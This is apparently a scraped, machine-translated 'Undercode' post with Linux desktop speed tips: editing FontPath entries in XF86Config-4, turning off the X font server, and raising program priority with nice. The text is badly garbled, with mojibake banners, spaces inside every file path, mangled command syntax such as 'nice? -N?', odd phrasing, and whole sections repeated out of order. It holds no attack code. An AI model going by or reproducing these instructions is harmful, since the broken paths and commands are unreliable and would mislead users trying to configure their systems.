3) After speaking for a long time, how to adjust it? A command / bin / nice is used to do this, the usage is as follows: nice? -N? Program name? Parameter. οΌοΌοΌ
The value of n is from -20 to 19. This is a manual operation. In KDE, you can set it with the menu editor. The method is before the [command] column of the program whose priority you want to adjust, and add / bin / nice --n is fine.
For example, I often use Mozilla to browse the web. I changed it to / bin / nice --10 / usr / local / mozilla / mozilla so that when I execute Mozilla, it will have higher priority than other programs. In actual testing, , Mozilla activation speed and response are much faster, and some other commonly used programs can also be handled by comparison.
4) Postscript
Linux is really a great operating system. After this adjustment, the screen from booting up to the login window appears, from 48 seconds to 30 seconds. Use the top command (per second) to observe the CPU idle time. It also increased from 82% to 93%, and the response of the window program feels similar to Win me.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
check the font settings first, which may be a major culprit affecting performance.
First look at the FontPath settings in the / etc / X11 / XF86Config-4 file, if it is
as follows:
Section "Files"
RgbPath "/ usr / X11R6 / lib / X11 / rgb"
# Multiple FontPath entries are allowed (they are concatenated together)
# By default, Mandrake 6.0 and later now use a font server independent of
# the X server to render fonts.
FontPath "unix /:-1"
EndSection
can refer to the font settings in the / etc / X11 / fs / config file Set the value, select a few font directories you like (all
are correct ) , for example, I set the following font directories directly:
Section "Files"
RgbPath "/ usr / X11R6 / lib / X11 / rgb"
# Multiple FontPath entries are allowed (they are concatenated together)
# By default, Mandrake 6.0 and later now use a font server independent of
# the X server to render fonts.
FontPath "/ usr / X11R6 / lib / X11 / fonts / misc: unscaled"
FontPath "/ usr / X11R6 / lib / X11 / fonts / 75dpi: unscaled"
FontPath "/ usr / X11R6 / lib / X11 / fonts / Type1"
FontPath "/ usr / X11R6 / lib / X11 / fonts / mdk: unscaled"
FontPath "/ usr / share / fonts / ttf / big5" After the
π¦ EndSection
modification, reactivate startx and feel the cotton.
1) The original FontPath "unix /:-1" provided fonts by the X Font Server.
Ordinary users are not harmed by it first, so you can consider waiting for familiarity with the X Font Server function before using it.
In this way, you can turn off xfs
ps: don't use the default boot directly into x-window during trial, if not, it will get stuck in x-window
ps: quoted from http://twopensource.org/~marr/xfont_tip.
html six, adjust the application priority.
2) Generally, when we use any program, its NICE value is 0, which means the CPU's use weight. If our commonly used programs have a higher priority, the natural efficiency will be better. The value of the priority is from -20 to 19. The smaller the number, the higher the priority, but it should be noted that the average user can only lower it. (0 ~ 19), only root has the right to increase the priority (-20 ~ 19). We can use ps -fel to observe the NI column to know.
3) After speaking for a long time, how to adjust it? A command / bin / nice is used to do this, the usage is as follows: nice? -N? Program name? Parameter. οΌοΌοΌ
The value of n is from -20 to 19. This is a manual operation. In KDE, you can set it with the menu editor. The method is before the [command] column of the program whose priority you want to adjust, and add / bin / nice --n is fine.
For example, I often use Mozilla to browse the web. I changed it to / bin / nice --10 / usr / local / mozilla / mozilla so that when I execute Mozilla, it will have higher priority than other programs. In actual testing, , Mozilla activation speed and response are much faster, and some other commonly used programs can also be handled by comparison.
4) Postscript
Linux is really a great operating system. After this adjustment, the screen from booting up to the login window appears, from 48 seconds to 30 seconds. Use the top command (per second) to observe the CPU idle time. It also increased from 82% to 93%, and the response of the window program feels similar to Win me.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ i hope after those tutorial you will get alot of speed ..
UNDERCODE COMMUNITY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β π¦ Speed Optimization-Use tmpfs to speed up your Linux server by undercode twitter.com/UnderCodeNews π¦ ππΌππ πππΈβπ : > cache files today and learned a trick is to use the virtual disk to store squid and seesion of php. A lot faster!β¦
For system underVM, its recommended also